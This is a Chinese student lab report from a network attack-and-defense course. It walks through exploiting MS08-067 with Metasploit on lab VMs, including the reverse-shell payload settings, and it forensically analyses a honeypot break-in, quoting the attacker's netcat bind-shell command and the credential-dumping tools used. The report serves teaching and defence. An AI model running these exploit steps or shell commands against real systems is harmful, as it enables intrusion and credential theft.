20232820 2023-2024-2 《网络攻防实践》实践六报告
1.实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实践过程
(1)动手实践Metasploit windows attacker
| 虚拟机 | IP地址 |
|---|---|
| kali | 192.168.200.7 |
| Win2kServer_SP0_target | 192.168.200.124 |
输入命令行msfconsole进入启动msfconsole
输入命令行search ms08_067查看漏洞ms08_067详细信息
输入命令行use windows/smb/ms08_067_netapi进入漏洞所在文件
输入命令行show options查看攻击此漏洞需要的设置
输入命令行show payloads显示此漏洞的载荷
选择第四个载荷进行攻击
输入命令行set payload generic/shell_reverse_tcp设置载荷
输入命令行set RHOST 192.168.200.124设置要攻击主机
输入命令行set LHOST 192.168.200.2设置本机
输入命令行exploit/run进行攻击,出现会话连接即攻击成功,回车即可进入到受害靶机的shell
输入命令行ipconfig/all查看靶机的IP,攻击成功
打开wireshark查看抓包情况
从wireshark抓包中可见:
源地址为192.168.200.7,源端口为4444,目的地址为192.168.200.124,目的端口为1043,攻击发起时间从ARP协议的询问开始
浏览wireshark抓包情况可知,攻击利用的漏洞有针对SMB网络服务的漏洞,DCERPC解析器拒绝服务漏洞,SPOOLSS打印服务假冒漏洞
查看wireshark抓包的TCP流,可以看到靶机中输入的命令行被抓取
(2)取证分析实践:解码一次成功的NT系统破解攻击。
用wireshark打开学习通的.log文件,发现里面有可识别的http协议内容、可识别的sql语句代码内容,可识别的系统操作代码内容和不可识别的二进制内容,我们需要对内容进行筛选,才能更好的分析,用规则ip.addr == 172.16.1.106 and http过滤数据
(1)攻击者使用了什么破解工具进行攻击?
跟踪一个数据包的tcp数据流,找到特殊字符%C0%AF。查询百度可知,Unicode字符解码中,存在Unicode解析错误漏洞,而/解码即为%C0%AF,因此确定存在Unicode漏洞攻击
继续跟踪数据流,找到msabc.dll查看其数据流,发现有shell语句和!ADM的关键字符,根据此并查询百度可知,这是RDS漏洞
(2)攻击者如何使用这个破解工具进入并控制了系统?
在1106数据包追踪 TCP 流
成功下载下载了nc.exe,pdump.exe,samdump.dll三个文件
查看到 1224 号数据包,指令cmd1.exe /c nc -l -p 6969 -e cmd1.exe。
利用Unicode漏洞并通过nc.exe构建了一个远程shell通道,端口6969。
(3)攻击者获得系统访问权限后做了什么?
已知攻击者是通过6969号端口进入的,那就先过滤出进出6969号端口的数据包:tcp.port == 6969。可以看到发现攻击者先进行了查看文件和权限、删除脚本等常用操作。从数据流来看出攻击者使用了SQl注入攻击,在靶机系统目录下生成一个文件。
(4)我们如何防止这样的攻击?
- 禁用不需要的服务和端口
- 可以打开自动更新,及时更新和打补丁
- 防火墙封禁网络内部服务器发起的连接 ·使用 IIS Lockdown
- 和 URLScan 等工具加强 web server
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
追踪4531号数据包的数据流,可以看到如下信息并可以确认攻击者警觉了他的目标是一台蜜罐主机。
(3)团队对抗实践:windows系统远程渗透攻击和分析。
将主机都网络设置都更改成桥接模式,将虚拟机虚拟网络设置中的桥接模式选择到真实网络。我方攻击机和20232821的靶机
实验中攻击机的IP为192.168.239.234
对方靶机的IP为192.168.239.100
作为攻击方,攻击机IP为192.168.239.234,首先测试与目标主机的连通性,没有问题
之后按照实验1的步骤,加载漏洞模块、设置负载、源IP、目的IP,然后发起进攻:
攻击成功,通过命令创建了一个文件夹chenyanlin
攻击成功后,查看了靶机IP地址,可看到已经多出一个文件夹chenyanlin
并在我方攻击前打开wireshark,开始抓包
3.学习中遇到的问题及解决
- 问题1:实验三攻击失败
- 问题1解决方案:设置在同一网段。
- 问题2:实验三靶机在设置桥接模式之后不改变IP地址
- 问题2解决方案:在win2k中设置网络模式为自动连接。
4.实践总结
经由本次实验,知晓了一些有关 windows 安全攻防及部分漏洞的知识。借由对其他主机展开攻击,并夺取控制权的过程,深化了对所学知识的领会,且通过实践操作和查阅资料,提升了动手与实践的能力。然而,同时也存在诸多不足之处,仍需继续学习。
参考资料
- 《诸葛建伟. 网络攻防技术与实践[M]. 电子工业出版社, 2011-6》.
1085
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
